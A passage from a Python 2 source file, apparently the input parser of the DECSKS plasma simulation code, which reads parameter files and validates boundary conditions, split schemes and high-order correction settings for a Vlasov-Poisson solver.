in the input deck, the aforementioned expectation was not met. Please revisit the entries (number of grid points) and high order correction specification.')\n\n # store lists containing number of total and active gridpoints\n # this is acknowledged as redundant given the above storing as Nx_active, Ny_active,\n # etc., but these objects are used in legacy methods inside DECSKS\n\n # initialize lists\n total_dims = [] # e.g. in 1D1V this could contain [Nx, Nvx]\n active_dims = [] # e.g. in 1D1V this could contain [Nx_active, Nvx_active]\n\n for var in phasespace_vars:\n total_dims.append(eval('N' + var))\n active_dims.append(eval('N' + var + '_active'))\n\n numdims = len(phasespace_vars)\n # --------------------------------------------------------------------------\n # Initial density specification (2 species)\n\n mu = safe_eval(lines[68][lines[68].find(':')+1:].strip())\n\n densities_list = lines[69][lines[69].find(':')+1:].strip().split(', ')\n for i in range(len(densities_list)):\n densities_list[i] = densities_list[i].lower()\n\n if len(densities_list) == 2: # if two species return dictionary of strings\n density = {}\n density['electrons'] = densities_list[0]\n density['electrons'] = density['electrons'].lower()\n density['ions'] = densities_list[1]\n density['ions'] = density['ions'].lower()\n print \"\\ntwo species simulation with initial densities:\\n\"\n print \"electrons: %s\" % density['electrons']\n print \"ions: %s\\n\" % density['ions']\n\n # --------------------------------------------------------------------------\n # split scheme specification\n\n split_scheme = lines[81][lines[81].find('=')+1:].strip()\n split_scheme = split_scheme.upper()\n print \"split scheme: %s\\n\" % split_scheme\n\n # filepath to splitting coefficient tables\n filename = lines[82][lines[82].find(':')+1:].strip()\n filepath = './etc/' + filename\n\n # get splitting coefficients for chosen scheme\n if split_scheme is not None:\n splitting = splitting_coefficients(filepath, split_scheme)\n else:\n splitting = None\n\n\n\n # --------------------------------------------------------------------------\n # check for validity on split scheme vs. boundary conditions\n #\n # i.e. check that if the problem is bounded, the user cannot use a split scheme that has negative time substeps\n #\n # Schemes with only positive time substeps: LF2\n # Schemes that contain negative time substeps: Y4, O6-4, O11-6, O14-6\n #\n\n for var in phasespace_vars:\n if BC['f'][var]['lower'] != 'periodic' and BC['f'][var]['upper'] != 'periodic':\n if split_scheme in ['LF2']:\n pass\n else: # a split scheme that involves negative time substeps has been selected\n print \"\\nThe following set of user specified information is not accepted by DECSKS:\\n\"\n print \"\\nin params.dat, the following was specified:\"\n print \"split scheme = %s:\" % split_scheme\n print \"\\nand the boundary data was specified in params_boundaryconditions.dat:\\n\"\n print \"distribution function lower boundary condition on %s: %s\" % (BC['f'][var]['lower'],var)\n print \"distribution function upper boundary condition on %s: %s\" % (BC['f'][var]['upper'], var)\n print \"\\nThe split scheme involves negative time substeps, while the boundary conditions are non-periodic. The BOUNDED Vlasov-Poisson problem is irreversible. A split scheme with negative time substeps can only be used in periodic systems, which correspond to systems of infinite extent\\n\"\n raise InputError('The split scheme involves negative time substeps, while the boundary conditions are non-periodic. The BOUNDED Vlasov-Poisson problem is irreversible. A split scheme with negative time substeps can only be used in periodic systems, which correspond to systems of infinite extent. To rectify this, the user may wish to select periodic boundary conditions on the distribution function (hence phi).')\n\n # --------------------------------------------------------------------------\n # Plot window specification (used in lib.plots.Setup)\n\n xmin = eval(lines[96][lines[96].find('=')+1:].strip())\n xmax = eval(lines[97][lines[97].find('=')+1:].strip())\n ymin = eval(lines[99][lines[99].find('=')+1:].strip())\n ymax = eval(lines[100][lines[100].find('=')+1:].strip())\n\n plot_params = dict(xmin = xmin, xmax = xmax,\n ymin = ymin, ymax = ymax)\n\n record_outputs = lines[103][lines[103].find(':')+1:].strip()\n record_outputs = record_outputs.lower()\n\n if record_outputs == 'yes':\n # output filepath setup\n filename = lines[104][lines[104].find(':')+1:].strip()\n filepath = './etc/' + filename\n outfiles = output_files(filepath) # dictionary of opened files\n else:\n outfiles = None\n\n # --------------------------------------------------------------------------\n # DICTIONARIES AND MATRICES RELEVANT FOR HIGH ORDER CORRECTION APPLICATIONS\n #\n\n # Constructing the finite different weight matrices, W.\n #-------------------------------------------------------\n # requires: (dict) FD_schemes\n #\n # Note: FD_schemes is only needed to construct W. W is what is used in\n # the simulation. Hence, the building routine for FD_schemes\n # is not optimized, since it happens before the simulation starts\n # and is not a source of repeated computational cost.\n #\n # FD_schemes is a dictionary containing the families of every order derivative\n # needed for the indicated global error N in etc/params.dat, i.e. all schemes\n # of various degrees of asymmetry and handedness. For large N, this can be a\n # large dictionary, cf. the function routine read_FD_schemes to see all\n # that gets stored inside. It is used to construct the difference coefficient\n # matrices W (for applying high order corrections). The other scheme\n # FD_scheme_dn1 is used to construct the matrix W_dn1 which is a difference\n # coefficient matrix for the first derivative (dn = 1) at LTE = 6, and used\n # to compute the electric field E = \"-dphi\" = W_dn1.dot(phi),\n # where dphi is the first derivative# of the electric potential, as calculated by\n # the methods in lib.fieldsolvers package\n #---------------------------------------------------------------------------\n #\n # initialize all dictionaries whose keys correspond to phase space vars\n # and whose values contain the relevant ndarrays\n\n Xi = {}\n xi = {}\n W = {}\n\n # top level check: if any var has FD corrections, store FD_schemes and init FD weight matrix W\n # for 6th order first derivative\n if 'FD' in HOC.values():\n # store finite difference schemes\n FD_schemes = read_FD_schemes(N)\n\n # if FD on a configuration variable, need to differentiate phi to obtain the acceleration a ~ E = -dphi\n if HOC['x'] == 'FD' or HOC['y'] == 'FD' or HOC['z'] == 'FD':\n # first derivative with LTE = 6, used to find dphi = -E after phi is\n # found from a 6th order Poisson solve\n FD_scheme_dn1 = read_FD_scheme(1,6)\n W_dn1_LTE6 = assemble_finite_difference_weight_matrix_const_dn_const_LTE(Nx_active,\n FD_scheme_dn1,\n dn = 1,\n LTE = 6\n )\n\n else:\n # else, Fourier Gauss solver is used, no need for this matrix\n W_dn1_LTE6 = None\n\n # variable-by-variable checks: assemble consistent objects needed\n # for the specified means of HOC from etc/params.dat\n\n # Note: the following is organized with the expectation that\n # higher dimensional implementations would be stepped through\n # as sets of 2D advection problems, always paired as z and vz\n # i.e. not as mixed stepthroughs with x paired with vy for example\n\n for var in phasespace_vars:\n if HOC[var] == 'FD':\n W[var] = assemble_finite_difference_weight_matrix(\n eval('N' + var + '_active'),\n N,\n FD_schemes\n )\n elif HOC[var] == 'FOURIER':\n # ensure the correct number of grid points\n # is passed for the generalized velocity Nvz_active\n # for x,y,z, 'vz' = vx, vy, vz\n # for vx, vy, vz, 'vz' = ax, ay, az, which have\n # the same number of dims as x, y, z, respectively\n # this is needed in the routine assemble_spectral_derivative_operator\n # so that the correctly dimensioned 2D arrays are returned\n\n if var[0] == 'v':\n # if a velocity variable, the velocity of this velocity is an acceleration\n # which has the same dimensions as the corresponding configuration variable\n # e.g. vx has velocity(vx) = ax which has the same dimensions as x\n Nvz_active = eval('N' + var[1] + '_active')\n else:\n # if a configuration variable, the velocity is the physical velocity, which\n # must be a coresponding active variable\n # e.g. x has a velocity vx\n Nvz_active = eval('Nv' + var + '_active')\n\n\n # The 3D tensor Xi is used to compute trigonometric derivatives\n # by operating on a 2D array of Fourier wave components (transformed\n # row-wise for each column, where as usual the objects have been\n # transpoed if needed so that the variation (x or vx) is along\n # rows, not columns)\n #\n # Fourier transform (derivatives) = Xi * Fourier transform (f)\n # derivatives = inverse transform (Xi * Fourier(f))\n #\n #\n # the object xi is used in legacy methods in DECSKS (pre-DECSKSv2.0)\n\n Xi, xi = assemble_spectral_derivative_operator(Xi, xi,\n var,\n eval('a' + var),\n eval('b' + var),\n eval('N' + var),\n eval('N' + var + '_active'),\n Nvz_active,\n N)\n\n # ---------------------------------------------------------------------\n # \"Alternating\" identity matrix\n\n # in lib.HOC.correctors, require an diagonal matrix with shape = (Nz_active, Nz_active)\n # with entries as (-1)^i, where i is the row number, for details see on github\n #\n # dsirajud/IPython-notebooks/\n # DECSKS-09 -- array-based implementation recast -- part 1.ipynb\n #\n # section \"2D casting of correction coefficients c (vector) -> c (tensor)\"\n\n I_alternating = np.diag( (-np.ones(N)) ** np.arange(N) )\n\n # ---------------------------------------------------------------------\n # Bernoulli number storage, and forming the matrices A_pos, A_neg\n\n # obtain Bernoulli numbers (note: only 23 numbers are entered into the dat file ->\n # max global error is 23 - 1 = 22) for a correction up to global error order\n # N, N-1 Bernoulli numbers are needed. If higher than global error order 22 is\n # desired, additional Bernoulli numbes need to be entered in\n #\n # etc/Table_of_Bernoulli_numbers.dat\n #\n\n # Store Bernoulli numbers from dat file etc/Table_of_Bernoulli_numbers.dat\n filename = 'Table_of_Bernoulli_numbers.dat'\n filepath = './etc/' + filename\n Bernoulli_numbers = Bernoulli(filepath)\n\n # \"A\" matrices for Bernoulli number storage and matrix HOC application\n # in lib.HOC.Beta_matrix, see notebook on github at\n # dsirajud/IPython-notebooks/\n # DECSKS-09 -- array-based implementation recast -- part 1.ipynb\n #\n # the A matrices are matrices containing scaled Bernoulli numbers (normalized by factorials)\n # that also factor in the sign (direction) information of the advecting density packets\n # (the different amounts to all odd coefficients having opposite sign)\n\n # The A matrices are used in the method lib.HOC.Beta_matrix (used to construct the array of the *magnitudes*\n # of the Nvz sets of N beta coefficients; note that the high order flux is further computed as a sum of\n # products that alternating with sign according to the parity of the derivative number, i.e. alternates signs\n # among odds and evens. These prefactors are applied at the end of the method lib.HOC.correctors by matrix\n # pre-multiplication of the matrix B with the alternating (in sight) identity matrix I formed above)\n\n # the method lib.HOC.Beta_matrix is called from inside lib.HOC.correctors (used to assemble the 2D array c of correctors)\n\n A_pos, A_neg = np.zeros([N,N]), np.zeros([N,N])\n for i in range(N):\n for j in range(i+1):\n A_pos[i,j] = Bernoulli_numbers[i-j] / scipy.misc.factorial(i-j)\n if (i - j) == 1:\n A_neg[i,j] = -A_pos[i,j]\n else:\n A_neg[i,j] = A_pos[i,j]\n\n A_matrix = {}\n # dictionary container\n # allow dictionary access to relevant matrix of Bernoulli numbers\n # by operating with str(int(np.sign(CFL.frac)))\n\n A_matrix['1'] = A_pos\n A_matrix['0'] = A_pos\n A_matrix['-1'] = A_neg\n\n #--------------------------------------------------------------------------------------------#\n # ELECTRIC POTENTIAL PHI\n #--------------------------------------------------------------------------------------------#\n\n #--------------------------------------------------------------------------------------------#\n # Boundary conditions BC['phi'] dictionary and dictionary of boundary values, phi_BC\n #\n # BC['phi']['x', 'y', or 'z']['lower' or 'upper'] = string keyword that describes the BC\n # phi_BC['x', 'y', or 'z'] = boundary value vector phi_BC that appears in a Poisson solver\n #--------------------------------------------------------------------------------------------#\n\n phi_BC = {}\n # keys: 'x', 'y', 'z'\n # values: ndarrays of size eval('N' + var + '_active)\n\n BC['phi'] = {}\n # keys: 'x', 'y', 'z'\n # values / keys for subdict: 'lower', 'upper'\n # values for subdict: string keyword that describes the BC at the key specification\n\n # --------------------------------------------------------------------------\n # PHI BOUNDARY CONDITIONS AND PHI BOUNDARY VALUES VECTORS FOR SOLVER Phi_BC['x', 'y', or 'z']\n\n # lines read in from boundaryconditions dat file were stored above in BC_infile_lines\n if HOC['x'] == 'FD':\n BC['phi']['x'] = {}\n BC['phi']['x']['lower'] = safe_eval(BC_infile_lines[196][BC_infile_lines[196].find('=')+1:].strip())\n BC['phi']['x']['upper'] = safe_eval(BC_infile_lines[197][BC_infile_lines[197].find('=')+1:].strip())\n phi_BC['x'] = np.zeros(Nx_active)\n elif HOC['x'] == 'FOURIER': # periodic fourier solver is used, a BC vector is not needed\n phi_BC['x'] = None\n\n if HOC['y'] == 'FD':\n BC['phi']['y'] = {}\n BC['phi']['y']['lower'] = safe_eval(BC_infile_lines[199][BC_infile_lines[199].find('=')+1:].strip())\n BC['phi']['y']['upper'] = safe_eval(BC_infile_lines[200][BC_infile_lines[200].find('=')+1:].strip())\n phi_BC['y'] = np.zeros(Ny_active)\n elif HOC['y'] == 'FOURIER': # periodic fourier solver is used, a BC vector is not needed\n phi_BC['y'] = None\n\n if HOC['z'] == 'FD':\n BC['phi']['z'] = {}\n BC['phi']['z']['lower'] = safe_eval(BC_infile_lines[202][BC_infile_lines[202].find('=')+1:].strip())\n BC['phi']['z']['upper'] = safe_eval(BC_infile_lines[203][BC_infile_lines[203].find('=')+1:].strip())\n phi_BC['z'] = np.zeros(Nz_active)\n elif HOC['z'] == 'FOURIER': # periodic fourier solver is used, a BC vector is not needed\n phi_BC['z'] = None\n\n # ensure all inputs stored above in BC['phi'] dict objects are uppercase and recognized\n for var in ['x', 'y', 'z']:\n if var in phasespace_vars:\n if HOC[var] == 'FOURIER':\n pass\n else: # HOC is FD which computes the Lorentz term through a potential phi (Fourier uses the electric field E)\n\n # LOWER BOUNDARY CHECKS\n if BC['phi'][var]['lower'] is None:\n raise InputError('a NoneType was specified as a LOWER boundary condition on the electric potential phi for an active variable (a non-NoneType was specified for the number of grid points on this variable). If the variable is not meant to be evolved, set its number of grid points to None')\n\n elif type(BC['phi'][var]['lower']) != str:\n raise InputError('a non-string type as a LOWER boundary condition on the electric potential phi for an active variable (a non-NoneType was specified for the number of grid points on this variable). If the variable is not intended to be active, set its number of grid points to None. Otherwise, a recognized string keyword must be specified on the boundary condition on phi for this variable.')\n\n else:\n BC['phi'][var]['lower'] = BC['phi'][var]['lower'].upper()\n\n if BC['phi'][var]['lower'] not in ['PERIODIC', 'SELF-CONSISTENT', 'SYMMETRIC', 'SYMMETRY', 'BIAS']:\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat is not a recognized keyword:\\n\\n\"\n print \"lower boundary condition on phi for variable %s: %s\" % (var, BC['phi'][var]['lower'].upper())\n\n raise InputError('boundary condition indicated on phi is not an accepted keyword option')\n\n elif (BC['phi'][var]['lower'] == 'SYMMETRIC' or BC['phi'][var]['lower'] == 'SYMMETRY') and BC['f'][var]['lower'] != 'symmetric':\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat is:\\n\\n\"\n print \"lower boundary condition on phi for variable %s: %s\\n\" % (var, BC['phi'][var]['lower'].upper())\n print \"lower boundary condition on f for variable %s: %s\" % (var, BC['f'][var]['lower'].upper())\n print \"upper boundary condition on f for variable %s: %s\\n\" % (var, BC['f'][var]['upper'].upper())\n\n print \"a SYMMETRIC boundary condition must be specified on both phi and f\"\n # by this point all synonyms have been normalized on BC['f'][var], 'symmetric' corresponds to the symmetry condition\n raise InputError('a SYMMETRY boundary condition on phi was specified, but a symmetry boundary was not specified on the distribution function f at this same (lower) boundary. A symmetric domain requires a lower boundary condition to be SYMMETRIC on both phi and f.')\n\n else:\n pass\n\n # UPPER BOUNDARY CHECKS\n if BC['phi'][var]['upper'] is None:\n raise InputError('a NoneType was specified as an upper boundary condition on the electric potential phi for an active variable (a non-NoneType was specified for the number of grid points on this variable). If the variable is not meant to be evolved, set its number of grid points to None')\n\n elif type(BC['phi'][var]['upper']) != str:\n raise InputError('a non-string type as an upper boundary condition on the electric potential phi for an active variable (a non-NoneType was specified for the number of grid points on this variable). If the variable is not intended to be active, set its number of grid points to None. Otherwise, a recognized string keyword must be specified on the boundary condition on phi for this variable.')\n\n else:\n BC['phi'][var]['upper'] = BC['phi'][var]['upper'].upper()\n\n if BC['phi'][var]['upper'] not in ['PERIODIC', 'SELF-CONSISTENT', 'SYMMETRIC', 'SYMMETRY', 'BIAS']:\n print \"\\nThe following boundary condition specified in params_boundaryconditions.dat is not a recognized boundary condition keyword:\\n\\n\"\n print \"upper boundary condition on phi for variable %s: %s\\n\" % (var, BC['phi'][var]['upper'].upper())\n\n raise InputError('boundary condition indicated on phi is not an accepted keyword option')\n\n elif BC['phi'][var]['upper'] == 'SYMMETRIC' or BC['phi'][var]['upper'] == 'SYMMETRY':\n print \"\\nThe following boundary condition specified in params_boundaryconditions.dat is not available:\\n\\n\"\n print \"upper boundary condition on phi: %s\\n\" % BC['phi'][var]['upper'].upper()\n\n raise NotImplementedError('a SYMMETRY boundary condition on phi as an UPPER boundary is specified in params_boundaryconditions.dat; only lower boundaries can support a symmetry boundary condition.')\n\n\n # CHECK FOR CONSISTENCY IN BOUNDARY CONDITIONS BETWEEN BOTH LOWER AND UPPER SPECIFICATIONS\n if BC['phi'][var]['lower'] == 'PERIODIC' and BC['phi'][var]['upper'] != 'PERIODIC':\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"lower boundary condition on phi for variable %s: %s\" % (var, BC['phi'][var]['lower'].upper())\n print \"upper boundary condition on phi for variable %s: %s\\n\\n\" % (var, BC['phi'][var]['upper'].upper())\n\n raise InputError('PERIODIC boundary conditions on phi involve both lower and upper boundaries. The read-in of params_boundaryconditions.dat has the lower boundary condition as PERIODIC but the upper boundary condition is NOT. Both boundary conditions on phi must be set to PERIODIC if a periodic plasma is to be simulated.')\n\n elif BC['phi'][var]['lower'] != 'PERIODIC' and BC['phi'][var]['upper'] == 'PERIODIC':\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"lower boundary condition on phi for variable %s: %s\" % (var, BC['phi'][var]['lower'].upper())\n print \"upper boundary condition on phi for variable %s: %s\\n\\n\" % (var, BC['phi'][var]['upper'].upper())\n\n raise InputError('PERIODIC boundary conditions on phi involve both lower and upper boundaries. The read-in of params_boundaryconditions.dat has the upper boundary condition as PERIODIC but the lower boundary condition is NOT. Both boundary conditions on phi must be set to PERIODIC if a periodic plasma is to be simulated.')\n\n elif BC['phi'][var]['lower'] == 'PERIODIC' and BC['phi'][var]['upper'] == 'PERIODIC':\n\n if BC['f'][var]['type'] != 'periodic': # note that validity and consistency checks on inputs for the distribution function have already been done above\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"lower boundary condition on phi for variable %s: %s\" % (var, BC['phi'][var]['lower'].upper())\n print \"upper boundary condition on phi for variable %s: %s\\n\" % (var, BC['phi'][var]['upper'].upper())\n print \"lower boundary condition on phi for variable %s: %s\" % (var, BC['f'][var]['lower'].upper())\n print \"upper boundary condition on phi for variable %s: %s\\n\" % (var, BC['f'][var]['upper'].upper())\n print \"e.g. periodic boundaries on phi require periodic boundaries on f for the same variable\\n\"\n raise InputError('PERIODIC boundary conditions on were specifed consistently for phi in params_boundaryconditions.dat; however, periodic boundary conditions must also be consistently specified on the distribution function. Revisit params_boundaryconditions.dat and ensure that both lower and upper boundaries on the distribution function f and the potential phi are set to PERIODIC if a periodic plasma is intended to be simulated.')\n elif BC['f'][var]['type'] == 'periodic': # note that validity and consistency checks on inputs for the distribution function have already been done above\n pass\n\n\n # CHECK FOR CONSISTENCY ON PHI BCS WITH HIGH ORDER CORRECTION METHOD SPECIFIED (note we have already checked this against the distribution function BCs)\n # here, we are only checking to see if that BCs on phi aren't periodic, to ensure that HOC is NOT set to fourier (relies on periodicity))\n # the following conditional check asks: \"if (BCs on phi are not periodic) AND (HOC is FOURIER)\"\n if ((BC['phi'][var]['lower'] == 'PERIODIC' and BC['phi'][var]['upper'] != 'PERIODIC') or (BC['phi'][var]['lower'] != 'PERIODIC' and BC['phi'][var]['upper'] == 'PERIODIC')) and HOC[var] == 'fourier':\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent with the specified high order correction method in params.dat: \\n\\n\"\n print \"lower boundary condition on phi for variable %s: %s\" % (var, BC['phi'][var]['lower'].upper())\n print \"upper boundary condition on phi for variable %s: %s\\n\\n\" % (var, BC['phi'][var]['upper'].upper())\n print \"upper boundary condition on phi for variable %s: %s\\n\\n\" % (var, HOC[var].upper())\n print \"\\n\\nFourier high order corrections require periodic boundary conditions on both phi and the distribution function f\\n\"\n\n raise InputError('the high order correction is specified as FOURIER; however, the BCs on the electric potential phi are not periodic. FOURIER corrections require PERIODIC BCs on phi and the distribution function as the methods rely on periodicity')\n\n #--------------------------------------------------------------------------------------------#\n # BIAS values\n #--------------------------------------------------------------------------------------------#\n\n Bias = {} # this dictionary is created for reading in the bias values, it is not returned\n # in sim_params dict. If a bias condition is set on any boundary, this dictionary\n # assigns its value at that boundary in the vector phi_BC[var], phi_BC[var] is\n # returned (as usual, var = ['x', 'y', 'z'])\n\n Bias['x'] = {}\n Bias['y'] = {}\n Bias['z'] = {}\n\n Bias['x']['lower'] = safe_eval(BC_infile_lines[214][BC_infile_lines[214].find('=')+1:].strip())\n Bias['x']['upper'] = safe_eval(BC_infile_lines[215][BC_infile_lines[215].find('=')+1:].strip())\n Bias['y']['lower'] = safe_eval(BC_infile_lines[217][BC_infile_lines[217].find('=')+1:].strip())\n Bias['y']['upper'] = safe_eval(BC_infile_lines[218][BC_infile_lines[218].find('=')+1:].strip())\n Bias['z']['lower'] = safe_eval(BC_infile_lines[220][BC_infile_lines[220].find('=')+1:].strip())\n Bias['z']['upper'] = safe_eval(BC_infile_lines[221][BC_infile_lines[221].find('=')+1:].strip())\n\n # check for valid inputs on active variables for any boundary that is specified as BIAS\n for var in ['x', 'y', 'z']:\n if var in phasespace_vars:\n if HOC[var] == 'FOURIER':\n pass\n else:\n for boundary in ['lower', 'upper']:\n if var in phasespace_vars:\n if BC['phi'][var][boundary] == 'BIAS':\n if Bias[var][boundary] is None: # if the BC is BIAS but the value input for the BIAS value is None\n print \"\\nThe following specifications in params_boundaryconditions.dat are inconsistent:\\n\"\n print \"%s boundary condition on phi for variable %s: %s\" % (boundary, var, BC['phi'][var][boundary].upper())\n print \"%s BIAS value on phi for variable %s: %s\\n\" % (boundary, var, Bias[var][boundary])\n print \"e.g. if a boundary condition on phi is set to BIAS for a variable, a number must be specifed under BIAS value\\n\"\n raise InputError('A phi boundary condition on an active variable (number of grid points on this variable has been set as non-None) has been specified as BIAS; however, the corresponding BIAS value is NoneType. Must be a number.')\n elif type(Bias[var][boundary]) == str:\n print \"\\nThe following specifications in params_boundaryconditions.dat are inconsistent:\\n\"\n print \"%s boundary condition on phi for variable %s: %s\" % (boundary, var, BC['phi'][var][boundary].upper())\n print \"%s BIAS value on phi for variable %s: %s\\n\" % (boundary, var, Bias[var][boundary])\n print \"e.g. if a boundary condition on phi is set to BIAS for a variable, a number must be specifed under BIAS value\\n\"\n\n raise InputError('A phi boundary condition on an active variable (number of grid points on this variable has been set as non-None) has been specified as BIAS; however, the corresponding BIAS value is str type. Must be a number.')\n else:\n pass\n\n # E is calculated by the following call flow, first an ORCHESTRATOR is called:\n #\n # E = lib.fieldsolvers.compute_electric_field_fourier <--- solves with a Gauss' law solver directly\n #\n # or\n #\n # E = lib.fieldsolvers.compute_electric_field_fd <--- solves a Poisson solver for phi, then differentiate to get E\n #\n # which can generally be called by eval operating on string handles that are themselves constructed\n # per 'lib.fieldsolvers.compute_electric_field_' + HOC[var].lower()\n #\n # If a finite difference routine is specified, a Poisson solve must be performed to obtain phi.\n # We call the relevant Poisson solver among the following options (L = lower boundary, U = upper boundary, DBC = Dirichlet BC, NBC = Neumann BC):\n #\n # Poisson_6th_PBC\n # Poisson_6th_LDBC_UDBC\n # Poisson_6th_LDBC_UNBC\n # Poisson_6th_LNBC_UDBC\n # Poisson_6th_LDBC_LDBC\n # Poisson_6th_UDBC_UNBC\n #\n\n # which are selected based on the boundary conditions the user has supplied in params_boundaryconditions.dat.\n #\n # finally, we compute and return:\n #\n # E = - 1 / config_var.width * W_dn1_LTE6.dot(phi)\n #\n\n # --------------------------------------------------------------------------\n # fieldsolver orchestator handle string for electric field (periodic or non-periodic)\n #\n # currently only 1D1V, only one handle needed. When this will be generalized, can make a dict object with keys corresponding\n # to each active configuration variable\n\n compute_electric_field_orchestrator_handle = {}\n for var in ['x', 'y', 'z']:\n if var in phasespace_vars:\n # dictionary key labels the component of the electric field: 'x', 'y', 'z'\n compute_electric_field_orchestrator_handle[var] = \"DECSKS.lib.fieldsolvers.compute_electric_field_\" + HOC[var].lower()\n\n\n # ---------------------------------------------------------------------\n # initialize dictionaries for wall charge objects\n\n sigma = {}\n sigma_n = {}\n\n for var in ['x', 'y', 'z']:\n if var in phasespace_vars:\n sigma_n[var] = {}\n sigma[var] = {}\n\n # --------------------------------------------------------------------------\n # Dictionary for the specific electric potential phi function solver needed\n # according to the specified boundary conditions on phi\n\n for var in ['x', 'y', 'z']:\n if var in phasespace_vars:\n\n if HOC[var] == 'FOURIER':\n pass # uses electric field E, periodic boundary conditions only\n\n else: # is FD corrections, and electric potential phi in a Poisson solver, can be periodic or other BCs\n BC['phi'][var]['type'] = BC['phi'][var]['lower'] + '_' + BC['phi'][var]['upper']\n if BC['phi'][var]['type'] == 'PERIODIC_PERIODIC':\n BC['phi'][var]['type'] = 'PBC'\n\n if BC['f'][var]['lower'] != 'periodic' and BC['f'][var]['upper'] != 'periodic':\n raise InputError('A boundary condition on phi was specified as BIAS; however, the corresponding boundary condition on f is not compatible (must be set to absorbing or equivalent synonym)')\n\n\n if BC['phi'][var]['type'] == 'BIAS_BIAS':\n BC['phi'][var]['type'] = 'LDBC_UDBC'\n\n # Dirichlet condition, phi = BIAS value\n phi_BC[var][0] = float(Bias[var]['lower'])\n # Dirichlet condition, phi = BIAS value\n phi_BC[var][-1] = float(Bias[var]['upper'])\n\n if BC['f'][var]['lower'] != 'absorbing' or BC['f'][var]['upper'] != 'absorbing': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n raise InputError('A boundary condition on phi was specified as BIAS; however, the corresponding boundary condition on f is not compatible (must be set to absorbing or equivalent synonym)')\n\n elif BC['phi'][var]['type'] == 'BIAS_SELF-CONSISTENT':\n BC['phi'][var]['type'] = 'LDBC_UNBC'\n\n # Dirichlet condition, phi = BIAS value\n phi_BC[var][0] = float(Bias[var]['lower'])\n # Neumann condition, dphi = sigma_upper, translates to phi_BC[-1] = -6 var.width * sigma_upper (see https://github.com/dsirajud/IPython-notebooks/DECSKS-04...ipynb for details)\n # phi_BC[-1] = - 6 * var.width * sim_params['sigma'][var]['upper'], changes with time step\n\n if BC['f'][var]['lower'] != 'absorbing': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n raise InputError('A lower boundary condition on phi was specified as BIAS; however, the corresponding boundary condition on f is not compatible (must be set to absorbing or equivalent synonym)')\n\n if BC['f'][var]['upper'] == 'collector': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n # initialize wall charge densities, sigma for the collector (f) /self-consistent (phi) conditions\n sigma[var]['upper'] = 0 # initialize to zero charge at time zero\n sigma_n[var]['upper'] = np.zeros(Nt + 1) # this was put in at one point for plotting wall charge vs. time\n else:\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"upper boundary condition on phi for variable %s: %s\\n\" % (var, BC['phi'][var]['upper'].upper())\n print \"upper boundary condition on f for variable %s: %s\\n\" % (var, BC['f'][var]['upper'].upper())\n print \"\\ne.g. an upper boundary condition on phi as SELF-CONSISTENT must have the upper boundary condition on f as COLLECTOR\"\n print \"\\ne.g. an upper boundary condition on f as ASBORBING must have the upper boundary condition on phi as BIAS\\n\"\n\n raise InputError('An upper boundary condition on phi was specified as SELF-CONSISTENT; however, the corresponding boundary condition on f is not compatible (must be set to collector)')\n\n elif BC['phi'][var]['type'] == 'SELF-CONSISTENT_BIAS':\n BC['phi'][var]['type'] = 'LNBC_UDBC'\n\n # Neumann condition, dphi = -sigma_lower, translates to phi_BC[0] = -6 var.width * sigma_lower (see https://github.com/dsirajud/IPython-notebooks/DECSKS-04...ipynb for details)\n #phi_BC[var][0] = - 6 * var.width * sim_params['sigma'][var]['lower'], changes with time step\n # Dirichlet condition, phi = BIAS value\n phi_BC[var][-1] = float(Bias[var]['upper'])\n\n # check upper boundary\n if BC['f'][var]['upper'] == 'absorbing': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n pass\n else:\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"upper boundary condition on phi for variable %s: %s\\n\" % (var, BC['phi'][var]['upper'].upper())\n print \"upper boundary condition on f for variable %s: %s\\n\\n\" % (var, BC['f'][var]['upper'].upper())\n print \"\\ne.g. an upper boundary condition set on phi as BIAS must have the upper boundary condition on f as ABSORBING\\n\"\n\n raise InputError('An upper boundary condition on phi was specified as BIAS; however, the corresponding boundary condition on f is not compatible (must be set to absorbing or equivalent synonym)')\n\n # check lower boundary\n if BC['f'][var]['lower'] == 'collector': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n # initialize wall charge densities, sigma for the collector (f) /self-consistent (phi) conditions\n sigma[var]['lower'] = 0 # initialize to zero charge at time zero\n sigma_n[var]['lower'] = np.zeros(Nt + 1) # this was put in at one point for plotting wall charge vs. time\n else:\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"lower boundary condition on phi: %s\" % BC['phi'][var]['lower'].upper()\n print \"lower boundary condition on f: %s\\n\" % BC['f'][var]['lower'].upper()\n print \"\\ne.g. an lower boundary condition set on phi as SELF-CONSISTENT must have the lower boundary condition on f as COLLECTOR\"\n print \"e.g. an lower boundary condition set on f as ABSORBING must have the lower boundary condition on phi as BIAS\"\n print \"e.g. an lower boundary condition set on f as PERIODIC requires the upper boundary on f to be PERIODIC as well as both lower and upper boundary conditions on phi to be set to PERIODIC\\n\"\n raise InputError('A lower boundary condition on phi was specified as SELF-CONSISTENT; however, the corresponding boundary condition on f is not compatible (must be set to collector if self-consistent boundary potentials are desired). Equivalently, phi is not compatible with f (e.g. if periodic boundaries on f were desired, the potential must also be periodic)')\n\n elif BC['phi'][var]['type'] == 'SYMMETRIC_BIAS' or BC['phi'][var]['type'] == 'SYMMETRY_BIAS':\n BC['phi'][var]['type'] = 'LNBC_UDBC'\n\n # Neumann condition, dphi = 0 for symmetry\n phi_BC[var][0] = 0.\n # Dirichlet condition, phi = BIAS value\n phi_BC[var][-1] = float(Bias[var]['upper'])\n\n if BC['f'][var]['upper'] != 'absorbing': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 